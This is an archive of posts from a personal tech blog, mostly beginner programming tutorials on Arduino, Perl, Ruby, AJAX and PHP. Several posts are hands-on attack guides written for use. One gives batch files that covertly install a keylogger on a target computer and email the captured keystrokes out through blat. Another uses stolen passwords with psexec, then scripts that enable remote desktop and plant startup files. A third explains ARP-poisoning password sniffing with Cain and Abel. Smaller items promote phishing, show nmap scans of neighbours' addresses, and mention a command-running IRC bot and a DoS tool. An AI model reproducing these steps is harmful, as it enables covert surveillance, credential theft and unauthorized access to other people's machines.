Showing posts with label tutorial. Show all posts
Showing posts with label tutorial. Show all posts

Saturday, October 3, 2009

Very Simple Tutorial for pygame and arduino, to get started making a gui for arduino part 1



This is how to get started, with python and your arduino, brining up the begginings of a GUI. It's just a taste of what you can do and I hope to go further on the subject. You need pygame, and the python firmata installed(explained here), and your arduino must have the firmata software on it as explained here. Here is the code I stole/wrote for getting the arduino to blink when you click within pygame. This outline should get you started with fun stuff:


#! /usr/bin/env python

import pygame
from firmata import *

proArduino = Arduino('/dev/ttyUSB0')
proArduino.pin_mode(13, firmata.OUTPUT)
proArduino.delay(2)

LEFT = 1
x = y = 0
screen = pygame.display.set_mode((640, 480))
running = 1

def blinky(pin_n):
proArduino.digital_write(pin_n, firmata.LOW)
proArduino.delay(2)
proArduino.digital_write(pin_n, firmata.HIGH)
proArduino.delay(2)


while running:
event = pygame.event.poll()
if event.type == pygame.QUIT:
running = 0
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == LEFT:
blinky(13)

screen.fill((100,0,0))
pygame.display.flip()



Right now I am experimenting with a lot of diffrent things(forking etc.), to see how the arduino and pygame can best interoperate.

Prepping Fedora Core for NXT brick, and Arduino, to be used with pygame and mod_python, in a python environment

If you do a fresh install of Fedora 11, you just need to save this script and run it as root on your machine, once you have saved it with a .sh extenstion, open the terminal, use the command su to become root, then navigate to the directory you have saved it in. Change the permissions, before you try to run it, so it is executable. Run it by typing dot then slash the the script name: ./scriptname.sh

Before the script:
su
chmod 777 scriptname.sh


#! /bin/bash
yum -y install mod_python
mkdir -p /var/www/html/test
cat <<-EOF >/etc/httpd/conf.d/pythonTwo.conf
<Directory /var/www/html/test>
AddHandler python-program .py
PythonHandler mptest
PythonDebug On
</Directory>
EOF
cat <<-EOF >/var/www/html/test/mptest.py
#!/usr/bin/python
from mod_python import apache

def handler(req):
req.send_http_header()
req.write("Hello World!")
return apache.OK
EOF
yum -y install python-devel
yum -y install git
git clone http://github.com/lupeke/python-firmata.git
cd python-firmata
python setup.py install
yum -y install gcc
yum -y install pybluez
yum -y install nxt_python
yum -y install pygame
/usr/sbin/apachectl restart


**caveat**
Be careful where you save it, it will create a directory for the python-firmata in that directory. If you use this right when your machine boots, there is a possibility the yum updater will start using yum, if the script will pause until the updater is finished using yum then continue, or you can run it before you start the script.

Wednesday, July 8, 2009

Perl Tutorial on Setting up a server monitoring bot.

There are two bot's both are based off the example on the example from the cpan page for POE::Component::IRC. The first is made to show your servers to load, external, and internal IP addresses(Using the Commands: load, ipadd, and exadd). The second one is more mischevious and runs any command you wish on the server by saying in the private channel the word system and then the command as in:system cat /etc/passwd . The second one can also run the slow loris DOS attack which affects versions of apache below 2.2.8 and some versions of squid proxy server. This DOS attack can take down small servers with only one machine running them, the second bot will not be revealed in this post but the next post. They both sign in to a password protected channel, however be aware that password is stored within the perl file which by it's nature makes it insecure. There are plans to add a diffrent authentication method in the future.

sudo cpan
at cpan shell:
install POE::Component::IRC

NOTE: This install from cpan did not work in my out of the box Fedora installation(and I did not have time to troubleshoot because I am trying to get this out so I can work on music until I get my new album out.), However it worked fine on both my Cent0S install and my Mac install.

It may ask you if you want to install dependencies and you do(it may ask more than once). It may also ask you to run tests, choose yes. This may take a while.

If you do not have cpan, install, install via yum or apt-get.
ie yum install cpan or apt-get install cpan

If you have not run cpan before you will need to set it up. That is beyond the scope of this post, however you tend to be ok with defaults.

After that while still in the cpan shell:
install LWP::Simple

It's a library in perl for pulling down webpages, the bot will use it to find your external ip.

Now copy or download the script to file. I did:
vi filename.pl
Then I hit the letter i
then I pasted the file

***Note, you will need to change $channel, $password, and $server, to your server channel and password. Otherwise you will end up on my server ^.^**

For linux(CentOS, cmds may vary) use:


use strict;
use warnings;
use POE qw(Component::IRC);
use LWP::Simple;

my $nickname = 'PoeIrcBot' . $$;
my $ircname = 'PoeIrcServerBot';
my $server = 'irc.malvager.com';
my $channel = "#channel";
my $password = "password";

my @channels = ('');

# We create a new PoCo-IRC object
my $irc = POE::Component::IRC->spawn(
nick => $nickname,
ircname => $ircname,
server => $server,
) or die "Oh noooo! $!";

POE::Session->create(
package_states => [
main => [ qw(_default _start irc_001 irc_public) ],
],
heap => { irc => $irc },
);

$poe_kernel->run();

sub _start {
my $heap = $_[HEAP];

# retrieve our component's object from the heap where we stashed it
my $irc = $heap->{irc};

$irc->yield( register => 'all' );
$irc->yield( connect => { } );
return;
}

sub irc_001 {
my $sender = $_[SENDER];

# Since this is an irc_* event, we can get the component's object by
# accessing the heap of the sender. Then we register and connect to the
# specified server.
my $irc = $sender->get_heap();

print "Connected to ", $irc->server_name(), "\n";

# we join our channels
$irc->yield( join => $_ ) for @channels;
$irc->yield( join => "$channel $password");
return;
}

sub irc_public {
my ($sender, $who, $where, $what) = @_[SENDER, ARG0 .. ARG2];
my $nick = ( split /!/, $who )[0];
my $channel = $where->[0];

if ( my ($loadWord) = $what =~ /^load/ ) {
my $uptime = `uptime`;
my $cpuUsagetwo = qr/(load average: \d+\.\d+, \d+\.\d+, \d+\.\d+)/;
if ($uptime =~ $cpuUsagetwo){
$irc->yield( privmsg => $channel => "$nick: $&" );
}
}
if ( my ($ipWord) = $what =~ /^ipadd/ ) {
my @ifconfig = `ifconfig`;
my $inetter = qr/(inet addr:\d+\.\d+\.\d+.\d+)/;
foreach (@ifconfig) {
my $line = $_;
if ($line =~ $inetter){
$irc->yield( privmsg => $channel => "$nick: $&" );
}
}
}

if ( my ($ipWordtwp) = $what =~ /^exadd/ ) {
my $whyip = qr/(Your IP address is \d+\.\d+\.\d+.\d+)/;
my $content = get("http://whatismyipaddress.com");
if($content =~ $whyip){
$irc->yield( privmsg => $channel => "$nick: $&" );
}
}

return;
}

# We registered for all events, this will produce some debug info.
sub _default {
my ($event, $args) = @_[ARG0 .. $#_];
my @output = ( "$event: " );

for my $arg (@$args) {
if ( ref $arg eq 'ARRAY' ) {
push( @output, '[' . join(', ', @$arg ) . ']' );
}
else {
push ( @output, "'$arg'" );
}
}
print join ' ', @output, "\n";
return 0;
}



For Mac use:


use strict;
use warnings;
use POE qw(Component::IRC);
use LWP::Simple;
#for mac
my $nickname = 'PoeIrcBot' . $$;
my $ircname = 'Flibble the Sailor Bot';
my $server = 'irc.malvager.com';
my $channel = "#channel";
my $password ="password";

my @channels = ('');

# We create a new PoCo-IRC object
my $irc = POE::Component::IRC->spawn(
nick => $nickname,
ircname => $ircname,
server => $server,
) or die "Oh noooo! $!";

POE::Session->create(
package_states => [
main => [ qw(_default _start irc_001 irc_public) ],
],
heap => { irc => $irc },
);

$poe_kernel->run();

sub _start {
my $heap = $_[HEAP];

# retrieve our component's object from the heap where we stashed it
my $irc = $heap->{irc};

$irc->yield( register => 'all' );
$irc->yield( connect => { } );
return;
}

sub irc_001 {
my $sender = $_[SENDER];

# Since this is an irc_* event, we can get the component's object by
# accessing the heap of the sender. Then we register and connect to the
# specified server.
my $irc = $sender->get_heap();

print "Connected to ", $irc->server_name(), "\n";

# we join our channels
$irc->yield( join => $_ ) for @channels;
$irc->yield( join => "$channel $password");
return;
}

sub irc_public {
my ($sender, $who, $where, $what) = @_[SENDER, ARG0 .. ARG2];
my $nick = ( split /!/, $who )[0];
my $channel = $where->[0];

if ( my ($loadWord) = $what =~ /^load/ ) {
my $uptime = `uptime`;
my $cpuUsagetwo = qr/(load averages: \d+\.\d+ \d+\.\d+ \d+\.\d+)/;
if ($uptime =~ $cpuUsagetwo){
$irc->yield( privmsg => $channel => "$nick: $&" );
}
}
if ( my ($ipWord) = $what =~ /^ipadd/ ) {
my @ifconfig = `ifconfig`;
my $inetter = qr/(inet \d+\.\d+\.\d+.\d+)/;
foreach (@ifconfig) {
my $line = $_;
if ($line =~ $inetter){
$irc->yield( privmsg => $channel => "$nick: $&" );
}
}
}

if ( my ($ipWordtwp) = $what =~ /^exadd/ ) {
my $whyip = qr/(Your IP address is \d+\.\d+\.\d+.\d+)/;
my $content = get("http://whatismyipaddress.com");
if($content =~ $whyip){
$irc->yield( privmsg => $channel => "$nick: $&" );
}
}

return;
}

# We registered for all events, this will produce some debug info.
sub _default {
my ($event, $args) = @_[ARG0 .. $#_];
my @output = ( "$event: " );

for my $arg (@$args) {
if ( ref $arg eq 'ARRAY' ) {
push( @output, '[' . join(', ', @$arg ) . ']' );
}
else {
push ( @output, "'$arg'" );
}
}
print join ' ', @output, "\n";
return 0;
}



Then to run it just type:perl filename.pl , and that should have you set.
*If you do no use perl filename.pl you will need to put a shebang at the top of the file(i.e #!/usr/bin/perl) with your particular path to perl.

If you liked this you will probably like:
Half finished windows IRC bot trojan/zombie
Getting External IP in Perl

Sunday, July 5, 2009

Perl Tutorial On Getting your External IP

Sometimes you need to find your external IP via perl, it's not that hard, but the only way I found to do it is kind of round about. You need to grab the page, whatismyipaddress.com then regex through it for your IP. Yeah this sucks, but it beats the hell out of the reception I got on #perl, but that's a diffrent post for a diffrent day. Ok so here are the steps:
On a unix or mac system you need to install lwp::simple first(On a windows system you can probably do this through ppm, just go to the cmd prompt and type ppm). To do that just run cpan:
sudo cpan
Then at the cpan prompt install LWP::Simple:
install LWP::Simple

Once that is installed, insert this bit of code into your code.


use LWP::Simple;
$whyip = qr/(Your IP address is \d+\.\d+\.\d+.\d+)/;
$content = get("http://whatismyipaddress.com");
if($content =~ $whyip){
print $&;
}


The first line imports the module.
The Second line declares a variable with the regular expression you are looking for.(Damnit, eneded a sentence with a preposition)
The third line says to "get" the website whatismyipaddress.com.
The third line says, if the regexp we declared in the scond line is matched, then we do the next line.
This line says we print the matched expression.
The Last line closes the if statement.

This project is a small bit of a larger project I am working on that will eventually be revealed. Oh yeah and if you really want to know about #perl on freenode and why I am dissapointed with it, just head on over to wereboobs.com.

If this was relevant to your interests you may also like my arp sniffing in perl post.

**CAVEAT, I start my programs by typing:perl filename.pl if you are doing ./filename.pl then you need a path she bang line like:
#!/usr/bin/perl <---for most linux systems #!/opt/local/bin/perl <-----for most mac systems
at the begining of your file

Sunday, April 19, 2009

Beggining Hardware/electrical/robotics Hacking Tutorial



Target rocks. Save the led's, I'll cut them off in the next video. Buy a multimeter, digital...unless you understand the caveats of analog.

Monday, April 13, 2009

Watch people as they die...or I love twitter...Ruby RSS tutorial




This is a tutorial to get ruby working with rss...in style. So I decide I wanted to have one of my LCD monitors to constantly scroll people's names as they died...but how would I achieve this feat? Well with a simple script that called several twitter feeds. At first I tried perl but as I was installing one of the modules I had a really HORRIBLE time trying to get it to work. So what I ended up doing is switching to ruby.* So there are three twitter feeds I choose to use...One was just the feed for #obits, I also wanted to use mydeathspace and the LA Times Obituary account. You can accummulate these feeds by going to search.twitter.com then, searching for something, then clickiing the, "I want the feed for this query" or something like that.

This tutorial assumes you have ruby and gems installed.
So the first thing I had to do was install the module...err gem for rss, for ruby, which is simple enough:

gem install simple-rss

Then I wrote this code I ripped off of about:


#!/usr/bin/env ruby
require 'rubygems'
require 'simple-rss'
require 'open-uri'

rss = SimpleRSS.parse(
open('http://search.twitter.com/search.atom?q=%23obit').read
)

rss.items.each do|i|
puts "Title: #{i.title}"
puts "Link: #{i.link}"
puts "=" * 80
end


Obviously I wasn't happy with that, for one I wanted a slow scroll and I wanted multiple feeds and I wanted it to loop so that it would always be outputting. So I added some sleeps and a loop like so:


#!/usr/bin/env ruby
require 'rubygems'
require 'simple-rss'
require 'open-uri'

loop {
rss = SimpleRSS.parse(
open('http://search.twitter.com/search.atom?q=%23obit').read
)

rss.items.each do|i|
puts "Title: #{i.title}"
puts "Link: #{i.link}"
puts "=" * 80
sleep 1
end
sleep 1

rssTwo = SimpleRSS.parse(
open('http://search.twitter.com/search.atom?q=+from%3Amydeathspace').read
)

rssTwo.items.each do|i|
puts "Title: #{i.title}"
puts "Link: #{i.link}"
puts "=" * 80
sleep 1
end
sleep 1

rssThree = SimpleRSS.parse(
open('http://search.twitter.com/search.atom?q=+from%3Alatimesobits').read
)

rssThree.items.each do|i|
puts "Title: #{i.title}"
puts "Link: #{i.link}"
puts "=" * 80
sleep 1
end
sleep 1
}



And there you go, now I have a monitor that basically let's me watch people die.....I am so happy.

*BTW if you are a perl guru and know how I can fix my UserAgent stuff, with a parse_head error, it would be awesomely cool if you could help me out.

Tuesday, February 24, 2009

So I want to do a video series called Drinking with BSDPunk a begginers guide to python...but

I want to do video tutorials for python, for my readers. Ok Ok I hear criticism from my fans, why why not perl. Well I am pretty ok with perl, and I am trying to hone another skill to increase my skillset. That being said I want to teach python as I learn. So this video would entail a drunken youtubed BSDPunk teaching python, however I am incredibly busy, but I could make time if the interest is there. So if you want this series to happen I need some comments or something to let me know more than EdgeX- would watch.

Sunday, January 11, 2009

How to install FreeBSD youtube video by BSDPunk


I made this video really quickly, to show how to install FreeBSD. I tried to cut my rambling out, but may have made the video less coherent in doing so. Anyways, enjoy the goodness. I installed it on vmware fusion for the mac but the install is identical on a machine and pretty close on any vmware product. Don't use virtual box yet, it has freebsd bugs.

Thursday, December 18, 2008

The hacker mindset: The Nashville MTA, ie taking the bus.

Route 3 West end bus


I have always been intrigued by public transportation particularly the ones that have technology involved. I also like walking, but anyway this is about the bus. Why would one ride the bus if they had the option of driving there own car. Well the upside is overall it is cheaper if you eliminate all the costs involved in owning a car including insurance, car payments, gas, tickets, pain, and suffering. It's also green, I suppose. So what are the cons of riding the bus, there's people on the bus, and everybody knows people suck. The bus takes more time, and that's a big deal. So I will try to address the cons and also explain the process of riding the bus one hacker to another.

Riding the bus.

So in the morning you need to get on the bus, and most likely if your leaving for work at a typical working time you can catch an epress bus which is about a buck more than a normal bus ride but it gets you to music city central about as fast as you could drive there. Why music city central? Well thats the bus station and where all the routes connect and probably the place you need to be going. Well you get on the bus now what well you need to pay for your ride, if you have a 5 10 or 20 you can buy that in bus fare, but you will use the entirety of your bill. If you have exact change you can do hat two. You can also get an all day pass for just under 5 dollars. After sticking your cash in the machine if you didn't use exact change you will get back a paper card with a magnetic strip with the amount of what you overpaid written on it, to be used next time you get. Ok now your on the bus, and if your like me, and people just don't do it for you, and you happen to be on an express bus, then most likely the bus is one of the extra long ones. This means that in the center there is a metal disk that rotates so the back half of the bus can rotate. There are four seats on this disk. No one likes to sit on the disk because it rotates about 45 degrees in both directions during your ride and the walls of the bus there aren't walls but canvas. So those seats are your best choice for avoiding having someone sit next to you.

Why are you headed to Music City Central anyway? Well because it is the bus station and where all the buses meet. Think of MTA as DNS. Music City Central is the root dns server. Sure there are transfer points but MMC is the big one(hah I said mmc and I waasn't talking about the Microsoft management console). If you want to take the analogy further then your route number is your network number in the ip your destanation is your host portion of the ip and your dns name is your bay numeber. Bay number is the "parking spot" your bus is at, at the MMC. Ok so I hate analogies and that was stupid but hell I am on the bus I got a lot of time to kill.

On the bus, to enjoy your time, if your not sitting next to someone a subnotebook, like a eeepc is only mildly uncomfortable. If you want to lsten to music you probably want an ipod or something smaller. If you want to read, I reccommend a paperback. And if you have problems with people your night ride is going to be a nightmare....unless you take a fairly late bus. This will help you avoid sitting next to anyone so that you can enjoy your music/reading whatever your doing.

Oh and another thing, bus drivers are suprisingly nice and well mannered. There also late quite a bit, however never count on this because I only put it at about a 55% chance.

As for the technology I haven't delved deeper into the magnetic strip, and there also appears to be something called a smartpass, that has RFID that I haven't gotten my hands on yet. So there may be a part two. There also is GPS or something keeping track of what stop is next because the bus announces it to you. The non express buses have an led bar near the front with the date and time and sometimes stop information. You hear a lot of hillarious and disturbing things on the bus if you keep your ears open. Although most of the time people on the bus only talk about riding the bus.

The last mile problem.

The last mile problem is something that is common with most forms of public transportation. It was thought that segways might fix this problem, silly jobs and Bezos. While the bus usually does a good job of getting you pretty close to work, most the time it is pretty far from your residence. For those of you who don't like to walk, this sucks. So I offer you another solution. I personally am looking at the wombat 250 electric skateboard.

The last mile problem Alright well my bus ride is almost over so I gotta split, or rather pull a cord.

Tuesday, September 9, 2008

Simple stupid forking in perl. Or starting a process separate from your perl script or app tutorial.

I was trying to get a program to start independently from my perl script, and was having a little difficulty today until I found this page which breaks it down pretty simple, however I am going to break it down a little farther for people like me who are pretty duh huh without explicit instructions.
This is from the page above:

if($pid = fork){
# Parent
command;
}elsif($pid == 0){
# Child
command;
# The child must end with an exit!!
exit;
}else{
# Error
die "Fork did not work\n";
}

So in itself it's pretty self explanatory, however you could have some problems if you don't explicitly declare $pid. But besides that you can literally just plug your commands in where it says command;. So maybe I was making it out harder than it was supposed to be, but anyway haves fun. Oh and here's a stupid simple example:


use strict;

my $pid;
if($pid = fork){
# Parent
system("calc");
}elsif($pid == 0){
# Child
system("notepad");
# The child must end with an exit!!
exit;
}else{
# Error
die "Fork did not work\n";
}

system("notepad");


Ok so what's this do. Well it starts calc as part of the parent program, then it starts notepad, once you close the program it will continue on to start a new notepad...so what's the difference between starting it this way and doing it this way:

system("calc");
system("notepad");
system("notepad");

Well without spawning a child process using for you will simply open calc, and once it is closed notepad is opened. Then when you close notepad, another notepad will open.

Saturday, May 31, 2008

AJAX tutorial for begginers

So ajax is a buzz word around the whole web 2.0 scene. It stands for Asynchronous JavaScript And XML. Basically it's just using some javascript to call a function called xmlHttpRequest(); .Anyway it's usually some pretty standard not changing code which you can get from the W3CSchools. I have made some slight modifications, that I find make the AJAX code work a little better.
What I did was write a simple stupid recursive function(smarm, I had been reading to much QC that week) that has a wait in it and a header thing, which I had to put in there due to some weird IE thing I still don't quite understand.
So this ajax code only does one little thing, it prints a diffrent page in a div every 5 seconds. Now the reason you would do this is if you had ever changing data in that html/php file, you put in the div. You also need onLoad="smarm()" in the body tag.


function ajaxFunction()
{
var xmlHttp;
try
{
xmlHttp=new XMLHttpRequest();
}
catch (e)
{
try
{
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e)
{
try
{
xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e)
{
alert("Your browser does not support AJAX!");
return false;
}
}
}
xmlHttp.onreadystatechange=function()
{
if(xmlHttp.readyState==4)
{
document.getElementById('stable').innerHTML=xmlHttp.responseText;
}
}
xmlHttp.open("POST","ajax2.php",true);
xmlHttp.send(null);
}
function smarm()
{
ajaxFunction();
var t=setTimeout("smarm()",5000);
http.setRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT");
}



So like ajax2.php might look something like this:

$handle = fopen('info.txt', 'a+');
$shiznit = fread($handle,600);
fclose($handle);

Or you could dump a mysql database table into an html table if that database was changing a lot.

Yeah and don't forget to add the div, in my example the div I used was "stable". So to do that you would just add div brackets with a class and id named stable. Also make sure you put the javascript in script brackets and the php in php brackets of course.

One caveat is that unless the page you are inserting into the div is somehow otherwise linked to your site, the content within it most likely well not be viewed by a search engine. So if you are building SEO intensive sites, be aware.



Friday, May 23, 2008

Yo, BSDPunk I want to know what IP's are looking at my site.

So this is broken down simple stupid line by line item by item, if you just want the code scroll to the bottom.

Well here is a little php fu for you guys.
Ok so the first line is:
$newb = "\n";

$newb is a variable we are declaring. By = "\n" we are telling it what the variable is. \n is special and declares a new line. Sp basically \n is a line break.
The quotes are necessary for \n to work because it is a string. The semicolon is used to end the line.

$ip = $_SERVER['REMOTE_ADDR'];

This is a server variable, of the person who is visiting the site.

$handle = fopen('info.txt', 'a+');

So fwrite says to call the variable with the fopen function and then writes the IP to the text file.

fwrite($handle, $newb);

Calls the same variable with to the text file and enters a line break or the $newb variable.

fclose($handle);

So fclose closes the file.


So here is the sum of the code:

$newb = "\n";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen('info.txt', 'a+');
fwrite($handle, $ip);
fwrite($handle, $newb);
fclose($handle);

And remember to go ahead and create info.txt. Also I was using WAMP so I didn't deal with any chmod stuff it's not working check your permissions, I have put this on a *nix server with 777 perms, but don't do that in a production environment, it's insecure.

Thursday, April 24, 2008

nmap lesson 2 (begginer)

Ok so you know how to nmap:
nmap 192.168.1.1
and you know how to nmap –P0 –O
nmap 192.168.1.1 –P0 –O
So now you want to know more. Ok so let’s find out your IP address. If you are in windows do an ipconfig if you are in *nix do a ifconfig. Ok so typically your behind a wireless router or something if you have cable or dsl. Or if your range is in between any of these:
10.0.0.0 to 10.255.255.255
172.16.0.0 to 172.31.255.255
192.168.0.0 to 192.168.255.255
That means you have a private IP address and that your router navigates the internet for you using NAT(PAT technically). So you need to find your publicly routable address. To find this goto ipchicken.com and it will tell you your external IP. So let’s say your IP is 68.52.155.53. Ok take this address and run it through arin.net or ripe.net if you are in Europe or afrinic if you are in Africa, etc..
Ok so my address gives me two, possible selections for Comcast:
Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. NASHVILLE-3 (NET-68-52-128-0-1)
68.52.128.0 - 68.52.159.255

I am going to choose the Nashville one because that is where I am at and it is a smaller range.
So I want to narrow my range down as much as possible so I have less results to look at. So I want to scan IP’s that are near mine, because most likely those are other Comcast customers and potentially even my neighbors. So I want to scan the range 68.52.155.x . x is going to stand for 0 through 255 and I also want to output this to a text file so that I can review it later, because it is going to take a long time. So here is my command:
nmap 68.52.155.0/24 –P0 –O –oN bob.txt
This well output everything to bob.txt in the current directory.
Next Lesson, interpreting ports.

Sunday, April 20, 2008

nmap step 1(begginer)

Your first nmap lesson.
Nmap is a port scanner, you can use it to find open ports. Once you find the open ports you can discover whether or not they are exploitable. Nmap can also be helpful in network troubleshooting or determining what os is behind what ip. But this tutorial just explains the basic scanning portion. You will need to download nmap. Nmap is at:
http://nmap.org/download.html
When you install it, it will come with WinPCAP which updates your TCP/IP stack. It will install this as part of the install. The version of NMAP you choose may come with a GUI, don’t use it. Use the cli.

Ok so after you get through installing nmap open the cmd. So start cmd, by hitting start, then run, then typing cmd. In vista you only need to hit start then type cmd. Now to aim nmap at your target you type:
nmap targetiporname
That will work for most targets, example:
nmap google.com
However that doesn’t work for all targets, some targets have ICMP(ping) turned off, and nmap pings a target to make sure it is up before scanning. So you may want to turn that feature off. So type:
nmap targetiporname –P0
Ok so that is a capital P and a zero. Usually I want to to know the OS my target is using as well so I do a
nmap targetiporname –P0 –O
And that is a capital O, so you should be able to scan your target now. I will right step 2 very soon, if you have any troubles with step 1 just get in contact with me.

Wednesday, April 2, 2008

How to SHA1 hash in python tutorial

import sha
resp = raw_input("What to SHA1? ")
hash = sha.new()
hash.update(resp)
print hash.hexdigest()

First line is importing the sha library.
Second line is printing "What to SHA1" then listening to a response, and putting that response into a variable named resp.
Third line is declaring a variable, hash, and that it is a new sha
Fourth line is saying update "hash" with the response of the user and sha it.
Last line print it.
This needs to be saved in a file with a .py extension and run from the cmd line.

Friday, March 14, 2008

Phishing Tutorial

Crow, a friend of mine made this phishing tutorial:

9unkz0r.com Forums: Phishing Tutorial
I don't do the phishing thing so I am just going to post his.

Monday, January 28, 2008

Key logging made easy.

You will need klogger from:

http://ntsecurity.nu/toolbox/klogger/

You will need a gmail account.

You will need blat from:

http://sourceforge.net/project/showfiles.php?group_id=81910

And Nircmd:

http://www.nirsoft.net/utils/nircmd.html

Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.

You should have blat.dll blat.exe blat.obj klogger and nircmd.

Ok now we are going to make two .bat files.

One is start.bat and the executable for the program:

nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat

The next one is go.bat and you will need to do some editing to it.

goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f
bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don’t use my email address use your own and your own password etc.
goto THREE


You should now have blat.dll blat.exe blat.obj go.bat klogger nircmd and start.bat.

Just drag your folder with these files to the target computer and run start.bat.


EDIT You will need to use a different server as gsmtp183.google.com is no longer
EDIT Publicly Availiable

Thursday, January 24, 2008

Accessing WinXP Pro computers in a corporate environment.

Accessing WinXP Pro computers in a corporate environment.

In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. Let’s say you got some windows passwords and cracked them, from my last tutorial.

Or let’s say you got some cleartext passwords from some http stuff and you think that those passwords are the same as the windows passwords.

Typically on corporate machines RDP is enabled but if it isn’t then you can use psexec to get your head in the door.

http://www.microsoft.com/technet/sysinternals/security/psexec.mspx

Open the cmd prompt by hitting start run, then typing cmd then hitting enter.

Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this or add psexec to the system path):

psexec \\machinename –u username cmd

It will prompt you for a password which you have conveniently commandeered. Oh and username should be the username not the word. This will start a command prompt on your machine that is actually operating from the other machine. So you have \\machinename ‘s cmd prompt open. You can do any of your normal command prompt stuff from here. PSEXEC has an option for uploading a file when you use it but it is a little tricky. What I do is use the net command to map a drive to your computer from the other computer. Like so:

Net use r: \\breadstick\public /persistant:no

Will map the drive to the computer breadstick’s shared folder named public. So now you can just type.(Remember this is in the other comps cmd not your own)

R:

to access it.

So you can run a silent install of vnc for some sweet gui action or if you know no one is actually in front of the computer you can create these three bat files. And run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0

second.bat

code:

netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat

third.bat

code:

cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat


This will enable remote desktop on that machine so that you may remote into it.

Wednesday, January 23, 2008

Sniffing for passwords

Sniffing for passwords.

Download and install Cain and Abel (oxid.it). If you have nmap or wireshark installed you probably won’t have to install winpcap(which comes with the installation.)

Run the program.

Make sure the sniffer tab is selected at the top and the hosts tab is selected at the bottom. Make sure the sniffer is on it is the green circuit board button in the top left corner. Alternate click in the white space and click on scan mac addresses. This does an arp scan(different from an IP scan). It will show everyone on your network except for you.

http://www.flickr.com/photos/23172723@N08/2214744335/


Now switch to the arp poisoning tab. APR bottom tab next to hosts. Click the + icon on the top of the menu. This will give you a choice of Ip addresses to poison. The most interesting traffic is going to be between the default gateway(which you can find by typing ipconfig in the command prompt) and the other users on the network. Select the default gateway on the left and all the other users on the right. **Optional fun Now if computers are sharing files, to snag their passwords you need to select all the ip’s to all the ip’s you have to do this one ip at the time on the left. **

http://www.flickr.com/photos/23172723@N08/2215536042/in/photostream/

If it is a large network you are going to want to monitor your resources on your computer to make sure you aren’t hitting 100% processor consumption or maxing out your ram. If this happens it will DDOS the network and people will start losing connections which is no good for password sniffing.

So now is the hard part….wait. Wait for people to log on to forums and myspace and all those great sites and wait for them to get in their vpns and telnets and such. One thing you can do while you wait is periodically check your internet connection to make sure you haven’t DDOSed the network. Ok so now time for the boon, click on the password tab at the bottom and see how many passwords you have racked up. If they are encrypted alt click on them and send them to the cracker built in to cain and abel.

**WOW THIS IS COOL TELL ME MORE ABOUT THE TCP/IP MAGIC**

On networks with a hub you don’t have to arp poison, but most modern networks are switched. So what is actually happening when you do this, is your computer answers every arp query as though it is the computer the packet is destined for. So your computer has all data from the network sent to it. I then routes(it doesn’t really route because that would be a layer three thing it would be more correct to say, it sends) the packets to the correct computer. So Cain has a bunch of prebuilt lists of stuff to look for, sometimes cain doesn’t catch all the passwords because of trixy web developers so if you have time you could run wireshark at the same time and manually comb through that data yourself. Etherflood is another program that will arp poison on a windows network. And if you’re a linux guy there is dsniff package with includes an arp spoofing tool.